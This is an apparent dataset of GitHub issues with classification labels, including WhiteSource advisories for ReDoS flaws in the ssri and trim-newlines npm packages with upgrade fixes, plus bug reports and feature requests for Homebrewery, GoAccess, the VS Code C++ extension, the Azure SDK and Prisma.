<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>ssri-7.1.0.tgz</b>, <b>ssri-6.0.1.tgz</b></p></summary>
<p>
<details><summary><b>ssri-7.1.0.tgz</b></p></summary>
<p>Standard Subresource Integrity library -- parses, serializes, generates, and verifies integrity metadata according to the SRI spec.</p>
<p>Library home page: <a href="https://registry.npmjs.org/ssri/-/ssri-7.1.0.tgz">https://registry.npmjs.org/ssri/-/ssri-7.1.0.tgz</a></p>
<p>Path to dependency file: /package.json</p>
<p>Path to vulnerable library: /node_modules/ssri/package.json</p>
<p>
Dependency Hierarchy:
- react-scripts-3.4.2.tgz (Root Library)
- terser-webpack-plugin-2.3.5.tgz
- cacache-13.0.1.tgz
- :x: **ssri-7.1.0.tgz** (Vulnerable Library)
</details>
<details><summary><b>ssri-6.0.1.tgz</b></p></summary>
<p>Standard Subresource Integrity library -- parses, serializes, generates, and verifies integrity metadata according to the SRI spec.</p>
<p>Library home page: <a href="https://registry.npmjs.org/ssri/-/ssri-6.0.1.tgz">https://registry.npmjs.org/ssri/-/ssri-6.0.1.tgz</a></p>
<p>Path to dependency file: /package.json</p>
<p>Path to vulnerable library: /node_modules/webpack/node_modules/ssri/package.json</p>
<p>
Dependency Hierarchy:
- react-scripts-3.4.2.tgz (Root Library)
- webpack-4.42.0.tgz
- terser-webpack-plugin-1.4.4.tgz
- cacache-12.0.4.tgz
- :x: **ssri-6.0.1.tgz** (Vulnerable Library)
</details>
<p>Found in base branch: <b>master</b></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary>
<p>
ssri 5.2.2-8.0.0, fixed in 8.0.1, processes SRIs using a regular expression which is vulnerable to a denial of service. Malicious SRIs could take an extremely long time to process, leading to denial of service. This issue only affects consumers using the strict option.
<p>Publish Date: 2021-03-12
<p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-27290>CVE-2021-27290</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>7.5</b>)</summary>
<p>
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: None
- Availability Impact: High
</p>
For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>.
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary>
<p>
<p>Type: Upgrade version</p>
<p>Origin: <a href="https://github.com/advisories/GHSA-vx3p-948g-6vhq">https://github.com/advisories/GHSA-vx3p-948g-6vhq</a></p>
<p>Release Date: 2021-03-12</p>
<p>Fix Resolution: ssri - 6.0.2,7.1.1,8.0.1</p>
</p>
</details>
<p></p>
***
Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github) | True | CVE-2021-27290 (High) detected in ssri-7.1.0.tgz, ssri-6.0.1.tgz - ## CVE-2021-27290 - High Severity Vulnerability
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>ssri-7.1.0.tgz</b>, <b>ssri-6.0.1.tgz</b></p></summary>
<p>
<details><summary><b>ssri-7.1.0.tgz</b></p></summary>
<p>Standard Subresource Integrity library -- parses, serializes, generates, and verifies integrity metadata according to the SRI spec.</p>
<p>Library home page: <a href="https://registry.npmjs.org/ssri/-/ssri-7.1.0.tgz">https://registry.npmjs.org/ssri/-/ssri-7.1.0.tgz</a></p>
<p>Path to dependency file: /package.json</p>
<p>Path to vulnerable library: /node_modules/ssri/package.json</p>
<p>
Dependency Hierarchy:
- react-scripts-3.4.2.tgz (Root Library)
- terser-webpack-plugin-2.3.5.tgz
- cacache-13.0.1.tgz
- :x: **ssri-7.1.0.tgz** (Vulnerable Library)
</details>
<details><summary><b>ssri-6.0.1.tgz</b></p></summary>
<p>Standard Subresource Integrity library -- parses, serializes, generates, and verifies integrity metadata according to the SRI spec.</p>
<p>Library home page: <a href="https://registry.npmjs.org/ssri/-/ssri-6.0.1.tgz">https://registry.npmjs.org/ssri/-/ssri-6.0.1.tgz</a></p>
<p>Path to dependency file: /package.json</p>
<p>Path to vulnerable library: /node_modules/webpack/node_modules/ssri/package.json</p>
<p>
Dependency Hierarchy:
- react-scripts-3.4.2.tgz (Root Library)
- webpack-4.42.0.tgz
- terser-webpack-plugin-1.4.4.tgz
- cacache-12.0.4.tgz
- :x: **ssri-6.0.1.tgz** (Vulnerable Library)
</details>
<p>Found in base branch: <b>master</b></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary>
<p>
ssri 5.2.2-8.0.0, fixed in 8.0.1, processes SRIs using a regular expression which is vulnerable to a denial of service. Malicious SRIs could take an extremely long time to process, leading to denial of service. This issue only affects consumers using the strict option.
<p>Publish Date: 2021-03-12
<p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-27290>CVE-2021-27290</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>7.5</b>)</summary>
<p>
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: None
- Availability Impact: High
</p>
For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>.
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary>
<p>
<p>Type: Upgrade version</p>
<p>Origin: <a href="https://github.com/advisories/GHSA-vx3p-948g-6vhq">https://github.com/advisories/GHSA-vx3p-948g-6vhq</a></p>
<p>Release Date: 2021-03-12</p>
<p>Fix Resolution: ssri - 6.0.2,7.1.1,8.0.1</p>
</p>
</details>
<p></p>
***
Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github) | non_process | cve high detected in ssri tgz ssri tgz cve high severity vulnerability vulnerable libraries ssri tgz ssri tgz ssri tgz standard subresource integrity library parses serializes generates and verifies integrity metadata according to the sri spec library home page a href path to dependency file package json path to vulnerable library node modules ssri package json dependency hierarchy react scripts tgz root library terser webpack plugin tgz cacache tgz x ssri tgz vulnerable library ssri tgz standard subresource integrity library parses serializes generates and verifies integrity metadata according to the sri spec library home page a href path to dependency file package json path to vulnerable library node modules webpack node modules ssri package json dependency hierarchy react scripts tgz root library webpack tgz terser webpack plugin tgz cacache tgz x ssri tgz vulnerable library found in base branch master vulnerability details ssri fixed in processes sris using a regular expression which is vulnerable to a denial of service malicious sris could take an extremely long time to process leading to denial of service this issue only affects consumers using the strict option publish date url a href cvss score details base score metrics exploitability metrics attack vector network attack complexity low privileges required none user interaction none scope unchanged impact metrics confidentiality impact none integrity impact none availability impact high for more information on scores click a href suggested fix type upgrade version origin a href release date fix resolution ssri step up your open source security game with whitesource | 0 |
811,222 | 30,279,693,777 | IssuesEvent | 2023-07-08 00:46:08 | naturalcrit/homebrewery | https://api.github.com/repos/naturalcrit/homebrewery | closed | Recent Items menu dropdown is inconsistent with other menu dropdowns | cleanup tweak P3 - low priority | ### Renderer
v3
### Browser
Chrome
### Operating System
Windows
### What happened?
The Recent Items (Edited/Viewed) dropdown menu is inconsistent with the other dropdown menus.
- appears instantly/not animated
- different HTML structure and classes
The content of the Recent Items dropdown may just need to be shifted to the existing Nav dropdown container framework.
### Code
_No response_ | 1.0 | Recent Items menu dropdown is inconsistent with other menu dropdowns - ### Renderer
v3
### Browser
Chrome
### Operating System
Windows
### What happened?
The Recent Items (Edited/Viewed) dropdown menu is inconsistent with the other dropdown menus.
- appears instantly/not animated
- different HTML structure and classes
The content of the Recent Items dropdown may just need to be shifted to the existing Nav dropdown container framework.
### Code
_No response_ | non_process | recent items menu dropdown is inconsistent with other menu dropdowns renderer browser chrome operating system windows what happened the recent items edited viewed dropdown menu is inconsistent with the other dropdown menus appears instantly not animated different html structure and classes the content of the recent items dropdown may just need to be shifted to the existing nav dropdown container framework code no response | 0 |
102,663 | 16,577,354,351 | IssuesEvent | 2021-05-31 07:12:12 | scriptex/url-shortener | https://api.github.com/repos/scriptex/url-shortener | closed | CVE-2021-33623 (Medium) detected in trim-newlines-3.0.0.tgz | security vulnerability | ## CVE-2021-33623 - Medium Severity Vulnerability
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>trim-newlines-3.0.0.tgz</b></p></summary>
<p>Trim newlines from the start and/or end of a string</p>
<p>Library home page: <a href="https://registry.npmjs.org/trim-newlines/-/trim-newlines-3.0.0.tgz">https://registry.npmjs.org/trim-newlines/-/trim-newlines-3.0.0.tgz</a></p>
<p>Path to dependency file: url-shortener/package.json</p>
<p>Path to vulnerable library: url-shortener/node_modules/trim-newlines</p>
<p>
Dependency Hierarchy:
- del-cli-3.0.1.tgz (Root Library)
- meow-6.1.1.tgz
- :x: **trim-newlines-3.0.0.tgz** (Vulnerable Library)
<p>Found in HEAD commit: <a href="https://github.com/scriptex/url-shortener/commit/179b1e0ec1849aceb57e4e0560791c2b4a0c0ecd">179b1e0ec1849aceb57e4e0560791c2b4a0c0ecd</a></p>
<p>Found in base branch: <b>master</b></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary>
<p>
The trim-newlines package before 3.0.1 and 4.x before 4.0.1 for Node.js has an issue related to regular expression denial-of-service (ReDoS) for the .end() method.
<p>Publish Date: 2021-05-28
<p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-33623>CVE-2021-33623</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>5.3</b>)</summary>
<p>
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: Low
- Availability Impact: None
</p>
For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>.
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary>
<p>
<p>Type: Upgrade version</p>
<p>Origin: <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33623">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33623</a></p>
<p>Release Date: 2021-05-28</p>
<p>Fix Resolution: trim-newlines - 3.0.1, 4.0.1</p>
</p>
</details>
<p></p>
***
Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github) | True | CVE-2021-33623 (Medium) detected in trim-newlines-3.0.0.tgz - ## CVE-2021-33623 - Medium Severity Vulnerability
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>trim-newlines-3.0.0.tgz</b></p></summary>
<p>Trim newlines from the start and/or end of a string</p>
<p>Library home page: <a href="https://registry.npmjs.org/trim-newlines/-/trim-newlines-3.0.0.tgz">https://registry.npmjs.org/trim-newlines/-/trim-newlines-3.0.0.tgz</a></p>
<p>Path to dependency file: url-shortener/package.json</p>
<p>Path to vulnerable library: url-shortener/node_modules/trim-newlines</p>
<p>
Dependency Hierarchy:
- del-cli-3.0.1.tgz (Root Library)
- meow-6.1.1.tgz
- :x: **trim-newlines-3.0.0.tgz** (Vulnerable Library)
<p>Found in HEAD commit: <a href="https://github.com/scriptex/url-shortener/commit/179b1e0ec1849aceb57e4e0560791c2b4a0c0ecd">179b1e0ec1849aceb57e4e0560791c2b4a0c0ecd</a></p>
<p>Found in base branch: <b>master</b></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary>
<p>
The trim-newlines package before 3.0.1 and 4.x before 4.0.1 for Node.js has an issue related to regular expression denial-of-service (ReDoS) for the .end() method.
<p>Publish Date: 2021-05-28
<p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-33623>CVE-2021-33623</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>5.3</b>)</summary>
<p>
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: Low
- Availability Impact: None
</p>
For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>.
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary>
<p>
<p>Type: Upgrade version</p>
<p>Origin: <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33623">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33623</a></p>
<p>Release Date: 2021-05-28</p>
<p>Fix Resolution: trim-newlines - 3.0.1, 4.0.1</p>
</p>
</details>
<p></p>
***
Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github) | non_process | cve medium detected in trim newlines tgz cve medium severity vulnerability vulnerable library trim newlines tgz trim newlines from the start and or end of a string library home page a href path to dependency file url shortener package json path to vulnerable library url shortener node modules trim newlines dependency hierarchy del cli tgz root library meow tgz x trim newlines tgz vulnerable library found in head commit a href found in base branch master vulnerability details the trim newlines package before and x before for node js has an issue related to regular expression denial of service redos for the end method publish date url a href cvss score details base score metrics exploitability metrics attack vector network attack complexity low privileges required none user interaction none scope unchanged impact metrics confidentiality impact none integrity impact low availability impact none for more information on scores click a href suggested fix type upgrade version origin a href release date fix resolution trim newlines step up your open source security game with whitesource | 0 |
24,645 | 12,138,164,963 | IssuesEvent | 2020-04-23 16:48:11 | Azure/azure-sdk-for-net | https://api.github.com/repos/Azure/azure-sdk-for-net | closed | [Sql] DatabasesOperationsExtensions.DeleteAsync() should throw if not exists | Mgmt SQL Service Attention | DatabasesOperationsExtensions.DeleteAsync() should throw an exception when the database does not exist. Currently you can await it and if the database doesn't exist it will simply carry on. This is in contrast to say attempting to delete a Dns record set which will throw if it does not exist. | 1.0 | [Sql] DatabasesOperationsExtensions.DeleteAsync() should throw if not exists - DatabasesOperationsExtensions.DeleteAsync() should throw an exception when the database does not exist. Currently you can await it and if the database doesn't exist it will simply carry on. This is in contrast to say attempting to delete a Dns record set which will throw if it does not exist. | non_process | databasesoperationsextensions deleteasync should throw if not exists databasesoperationsextensions deleteasync should throw an exception when the database does not exist currently you can await it and if the database doesn t exist it will simply carry on this is in contrast to say attempting to delete a dns record set which will throw if it does not exist | 0 |
11,724 | 14,563,428,410 | IssuesEvent | 2020-12-17 02:29:42 | allinurl/goaccess | https://api.github.com/repos/allinurl/goaccess | closed | Can goaccess support the second ip address? | enhancement log-processing log/date/time format | Hello, my server is behind a proxy server.
My nginx log looks like this:
a.a.a.a (remote_addr)-[12 /Aug/ 2020: 20: 50: 02 +0000] "GET /" 302 5 "-"" Mozilla / 5.0" "b.b.b.b" (XFF)
I use "~h" to get the user's ip from the X-Forwarded-For (XFF) field, but sometimes some crawlers may scan my server directly through the ip address. In this case, XFF is "-", which may cause goaccess to throw a "Token for '%h' specifier is NULL" error.
I tried the "--no-ip-validation" option, but when the XFF of the first line of the log file is "-", the option does not work.
I prefer to set remote_addr (a.a.a.a) as the second host. When the first host is "-", goaccess can use the second host.
Can you support a second IP address?
Best wishes | 1.0 | Can goaccess support the second ip address? - Hello, my server is behind a proxy server.
My nginx log looks like this:
a.a.a.a (remote_addr)-[12 /Aug/ 2020: 20: 50: 02 +0000] "GET /" 302 5 "-"" Mozilla / 5.0" "b.b.b.b" (XFF)
I use "~h" to get the user's ip from the X-Forwarded-For (XFF) field, but sometimes some crawlers may scan my server directly through the ip address. In this case, XFF is "-", which may cause goaccess to throw a "Token for '%h' specifier is NULL" error.
I tried the "--no-ip-validation" option, but when the XFF of the first line of the log file is "-", the option does not work.
I prefer to set remote_addr (a.a.a.a) as the second host. When the first host is "-", goaccess can use the second host.
Can you support a second IP address?
Best wishes | process | can goaccess support the second ip address hello my server is behind a proxy server my nginx log looks like this a a a a remote addr get mozilla b b b b xff i use h to get the user s ip from the x forwarded for xff field but sometimes some crawlers may scan my server directly through the ip address in this case xff is which may cause goaccess to throw a token for h specifier is null error i tried the no ip validation option but when the xff of the first line of the log file is the option does not work i prefer to set remote addr a a a a as the second host when the first host is goaccess can use the second host can you support a second ip address best wishes | 1 |
63,983 | 26,567,068,387 | IssuesEvent | 2023-01-20 21:25:53 | microsoft/vscode-cpptools | https://api.github.com/repos/microsoft/vscode-cpptools | closed | Contribute to the language status | Language Service Feature Request | Hi VS Code PM here 👋
Currently the C++ extension contributes individual items to the status bar. On my macOS I see the `Mac` item in the status bar. I also see some progress items like the occasional flame icon (pictures).
I suggest to use the [language status bar](https://code.visualstudio.com/updates/v1_61#_new-javascript-and-typescript-language-status-item), Typescript is already using this (picture attached).
This way all the C++ status bar items will come under a common item making the whole status bar experience cleaner for our users.
The status bar items which are actually progress our current advise is to use the `withProgress`-API. With that you announce a long running thing to VS Code. Our current thinking is to add a new progress location which is the extension’s language status. With that we can render something on the composite item as well as on the item itself. This is being discussed [here](https://github.com/microsoft/vscode/issues/129037#issuecomment-957360329), please chime in.
fyi @bobbrow @jureid @jrieken @egamma



| 1.0 | Contribute to the language status - Hi VS Code PM here 👋
Currently the C++ extension contributes individual items to the status bar. On my macOS I see the `Mac` item in the status bar. I also see some progress items like the occasional flame icon (pictures).
I suggest to use the [language status bar](https://code.visualstudio.com/updates/v1_61#_new-javascript-and-typescript-language-status-item), Typescript is already using this (picture attached).
This way all the C++ status bar items will come under a common item making the whole status bar experience cleaner for our users.
The status bar items which are actually progress our current advise is to use the `withProgress`-API. With that you announce a long running thing to VS Code. Our current thinking is to add a new progress location which is the extension’s language status. With that we can render something on the composite item as well as on the item itself. This is being discussed [here](https://github.com/microsoft/vscode/issues/129037#issuecomment-957360329), please chime in.
fyi @bobbrow @jureid @jrieken @egamma



| non_process | contribute to the language status hi vs code pm here 👋 currently the c extension contributes individual items to the status bar on my macos i see the mac item in the status bar i also see some progress items like the occasional flame icon pictures i suggest to use the typescript is already using this picture attached this way all the c status bar items will come under a common item making the whole status bar experience cleaner for our users the status bar items which are actually progress our current advise is to use the withprogress api with that you announce a long running thing to vs code our current thinking is to add a new progress location which is the extension’s language status with that we can render something on the composite item as well as on the item itself this is being discussed please chime in fyi bobbrow jureid jrieken egamma | 0 |
14,067 | 16,890,488,014 | IssuesEvent | 2021-06-23 08:39:58 | arcus-azure/arcus.messaging | https://api.github.com/repos/arcus-azure/arcus.messaging | opened | Move `ServiceBusReceiver` to options model for furture-proof message routing | area:message-processing enhancement integration:service-bus | **Is your feature request related to a problem? Please describe.**
Move our `ServiceBusReceiver` model from the router signature to an options model so that we are more safe in the future when we want to add stuff from the Azure Functions/message pump to the router.
**Describe alternatives you've considered**
Adding new stuff to the signature, but that requires breaking changes. | 1.0 | Move `ServiceBusReceiver` to options model for furture-proof message routing - **Is your feature request related to a problem? Please describe.**
Move our `ServiceBusReceiver` model from the router signature to an options model so that we are more safe in the future when we want to add stuff from the Azure Functions/message pump to the router.
**Describe alternatives you've considered**
Adding new stuff to the signature, but that requires breaking changes. | process | move servicebusreceiver to options model for furture proof message routing is your feature request related to a problem please describe move our servicebusreceiver model from the router signature to an options model so that we are more safe in the future when we want to add stuff from the azure functions message pump to the router describe alternatives you ve considered adding new stuff to the signature but that requires breaking changes | 1 |
4,176 | 7,111,508,980 | IssuesEvent | 2018-01-17 14:26:33 | geneontology/go-ontology | https://api.github.com/repos/geneontology/go-ontology | reopened | question about immune response supression terms | Other term-related request PomBase low priority multiorganism processes | Yep, out of my depth here.
I am annotating a few pathogen-host interaction papers to test some data types they may need to annotate in Canto.
As part of this I'm making some (tentative) GO annotation suggestions.
I was looking for a term to capture the supression of the host defence resonse by the pathogen
This looked correct:
GO:0052261 suppression of defense response of other organism involved in symbiotic interaction
Any process in which an organism stops, prevents, or reduces the frequency, rate or extent of the defense response of a second organism, where the two organisms are in a symbiotic interaction.
Then I saw the descendent
GO:0052037 negative regulation by symbiont of host defense response
Any process in which an organism stops, prevents, or reduces the frequency, rate or extent of the defense response of the host organism. The host is defined as the larger of the organisms involved in a symbiotic interaction.
How are these not the same?
Isn't suppression equivalent to negative regulation?
GO:0052037 has additional parents, one of which is
GO:0044414 suppression of host defenses
Any process in which an organism stops, prevents, or reduces the frequency, rate or extent of host defense(s) by active mechanisms that normally result in the shutting down of a host pathway. The host is defined as the larger of the organisms involved in a symbiotic interaction.
Which also sounds the same?
| 1.0 | question about immune response supression terms - Yep, out of my depth here.
I am annotating a few pathogen-host interaction papers to test some data types they may need to annotate in Canto.
As part of this I'm making some (tentative) GO annotation suggestions.
I was looking for a term to capture the supression of the host defence resonse by the pathogen
This looked correct:
GO:0052261 suppression of defense response of other organism involved in symbiotic interaction
Any process in which an organism stops, prevents, or reduces the frequency, rate or extent of the defense response of a second organism, where the two organisms are in a symbiotic interaction.
Then I saw the descendent
GO:0052037 negative regulation by symbiont of host defense response
Any process in which an organism stops, prevents, or reduces the frequency, rate or extent of the defense response of the host organism. The host is defined as the larger of the organisms involved in a symbiotic interaction.
How are these not the same?
Isn't suppression equivalent to negative regulation?
GO:0052037 has additional parents, one of which is
GO:0044414 suppression of host defenses
Any process in which an organism stops, prevents, or reduces the frequency, rate or extent of host defense(s) by active mechanisms that normally result in the shutting down of a host pathway. The host is defined as the larger of the organisms involved in a symbiotic interaction.
Which also sounds the same?
| process | question about immune response supression terms yep out of my depth here i am annotating a few pathogen host interaction papers to test some data types they may need to annotate in canto as part of this i m making some tentative go annotation suggestions i was looking for a term to capture the supression of the host defence resonse by the pathogen this looked correct go suppression of defense response of other organism involved in symbiotic interaction any process in which an organism stops prevents or reduces the frequency rate or extent of the defense response of a second organism where the two organisms are in a symbiotic interaction then i saw the descendent go negative regulation by symbiont of host defense response any process in which an organism stops prevents or reduces the frequency rate or extent of the defense response of the host organism the host is defined as the larger of the organisms involved in a symbiotic interaction how are these not the same isn t suppression equivalent to negative regulation go has additional parents one of which is go suppression of host defenses any process in which an organism stops prevents or reduces the frequency rate or extent of host defense s by active mechanisms that normally result in the shutting down of a host pathway the host is defined as the larger of the organisms involved in a symbiotic interaction which also sounds the same | 1 |
509,277 | 14,727,309,271 | IssuesEvent | 2021-01-06 08:19:53 | webcompat/web-bugs | https://api.github.com/repos/webcompat/web-bugs | closed | en.m.wikipedia.org - see bug description | browser-fenix engine-gecko priority-critical | <!-- @browser: Firefox Mobile 86.0 -->
<!-- @ua_header: Mozilla/5.0 (Android 10; Mobile; rv:86.0) Gecko/86.0 Firefox/86.0 -->
<!-- @reported_with: android-components-reporter -->
<!-- @public_url: https://github.com/webcompat/web-bugs/issues/65027 -->
<!-- @extra_labels: browser-fenix -->
**URL**: https://en.m.wikipedia.org/wiki/Main_Page
**Browser / Version**: Firefox Mobile 86.0
**Operating System**: Android
**Tested Another Browser**: Yes Chrome
**Problem type**: Something else
**Description**: crash after searching for an article.
**Steps to Reproduce**:
After typing in a search the browser crashes. I have not changed any settings.
<details>
<summary>View the screenshot</summary>
<img alt="Screenshot" src="https://webcompat.com/uploads/2021/1/0e501262-1de4-4c85-a0fa-10488a33e9ba.jpeg">
</details>
<details>
<summary>Browser Configuration</summary>
<ul>
<li>gfx.webrender.all: false</li><li>gfx.webrender.blob-images: true</li><li>gfx.webrender.enabled: false</li><li>image.mem.shared: true</li><li>buildID: 20210103092941</li><li>channel: nightly</li><li>hasTouchScreen: true</li><li>mixed active content blocked: false</li><li>mixed passive content blocked: false</li><li>tracking content blocked: false</li>
</ul>
</details>
[View console log messages](https://webcompat.com/console_logs/2021/1/ce3c0dcf-a7c6-44ed-b2c5-1250d8c7bb60)
_From [webcompat.com](https://webcompat.com/) with ❤️_ | 1.0 | en.m.wikipedia.org - see bug description - <!-- @browser: Firefox Mobile 86.0 -->
<!-- @ua_header: Mozilla/5.0 (Android 10; Mobile; rv:86.0) Gecko/86.0 Firefox/86.0 -->
<!-- @reported_with: android-components-reporter -->
<!-- @public_url: https://github.com/webcompat/web-bugs/issues/65027 -->
<!-- @extra_labels: browser-fenix -->
**URL**: https://en.m.wikipedia.org/wiki/Main_Page
**Browser / Version**: Firefox Mobile 86.0
**Operating System**: Android
**Tested Another Browser**: Yes Chrome
**Problem type**: Something else
**Description**: crash after searching for an article.
**Steps to Reproduce**:
After typing in a search the browser crashes. I have not changed any settings.
<details>
<summary>View the screenshot</summary>
<img alt="Screenshot" src="https://webcompat.com/uploads/2021/1/0e501262-1de4-4c85-a0fa-10488a33e9ba.jpeg">
</details>
<details>
<summary>Browser Configuration</summary>
<ul>
<li>gfx.webrender.all: false</li><li>gfx.webrender.blob-images: true</li><li>gfx.webrender.enabled: false</li><li>image.mem.shared: true</li><li>buildID: 20210103092941</li><li>channel: nightly</li><li>hasTouchScreen: true</li><li>mixed active content blocked: false</li><li>mixed passive content blocked: false</li><li>tracking content blocked: false</li>
</ul>
</details>
[View console log messages](https://webcompat.com/console_logs/2021/1/ce3c0dcf-a7c6-44ed-b2c5-1250d8c7bb60)
_From [webcompat.com](https://webcompat.com/) with ❤️_ | non_process | en m wikipedia org see bug description url browser version firefox mobile operating system android tested another browser yes chrome problem type something else description crash after searching for an article steps to reproduce after typing in a search the browser crashes i have not changed any settings view the screenshot img alt screenshot src browser configuration gfx webrender all false gfx webrender blob images true gfx webrender enabled false image mem shared true buildid channel nightly hastouchscreen true mixed active content blocked false mixed passive content blocked false tracking content blocked false from with ❤️ | 0 |
10,187 | 4,717,163,259 | IssuesEvent | 2016-10-16 13:31:19 | DMSC-Instrument-Data/plankton | https://api.github.com/repos/DMSC-Instrument-Data/plankton | opened | Introduce "system tests" | build tools enhancement unit tests | We should think of a good way to implement system tests, meaning tests that involve communication with a device in a certain setup using the device protocol. We might do this either by spinning up a docker container with the device running in the configuration that is to be tested.
We could use the python unit test framework and combine it with something like [docker-py](https://docker-py.readthedocs.io/en/latest/) to start containers etc. | 1.0 | Introduce "system tests" - We should think of a good way to implement system tests, meaning tests that involve communication with a device in a certain setup using the device protocol. We might do this either by spinning up a docker container with the device running in the configuration that is to be tested.
We could use the python unit test framework and combine it with something like [docker-py](https://docker-py.readthedocs.io/en/latest/) to start containers etc. | non_process | introduce system tests we should think of a good way to implement system tests meaning tests that involve communication with a device in a certain setup using the device protocol we might do this either by spinning up a docker container with the device running in the configuration that is to be tested we could use the python unit test framework and combine it with something like to start containers etc | 0 |
381,095 | 26,439,416,383 | IssuesEvent | 2023-01-15 19:51:08 | MarkHuntDev/tatbash-bot | https://api.github.com/repos/MarkHuntDev/tatbash-bot | opened | Write readme and using instructions | documentation | Instructions could be wrote in github's wiki or telegram's articles (https://telegram.org/blog/instant-view%C2%BB). | 1.0 | Write readme and using instructions - Instructions could be wrote in github's wiki or telegram's articles (https://telegram.org/blog/instant-view%C2%BB). | non_process | write readme and using instructions instructions could be wrote in github s wiki or telegram s articles | 0 |
17,846 | 23,784,345,364 | IssuesEvent | 2022-09-02 08:41:43 | prisma/prisma | https://api.github.com/repos/prisma/prisma | opened | Reformat unreachable code: Encountered impossible declaration during formatting: Pair { rule: type_alias, span: Span { str: "type TemplatesWorkflowBlocksPreviewCgFyYw1LdGVycy50CmlnZ2VyRxZlbnQ=Children", start: 84223, end: 84298 }, inner: [Pair { rule: TYPE_KEYWORD, span: Span { str: "type", start: 84223, end: 84227 }, inner: [] }, Pair { rule: identifier, span: Span { str: "TemplatesWorkflowBlocksPreviewCgFyYw1LdGVycy50CmlnZ2VyRxZlbnQ", start: 84228, end: 84289 }, inner: [] }, Pair { rule: base_type, span: Span { str: "Children", start: 84290, end: 84298 }, inner: [Pair { rule: identifier, span: Span { str: "Children", start: 84290, end: 84298 }, inner: [] }] }] } | kind/bug process/candidate topic: error reporting team/schema tech/engines/formatter engine | <!-- If required, please update the title to be clear and descriptive -->
Command: `prisma db pull`
Version: `4.3.0`
Binary Version: `c875e43600dfe042452e0b868f7a48b817b9640b`
Report: https://prisma-errors.netlify.app/report/14273
OS: `x64 linux 4.4.0-22621-Microsoft`
JS Stacktrace:
```
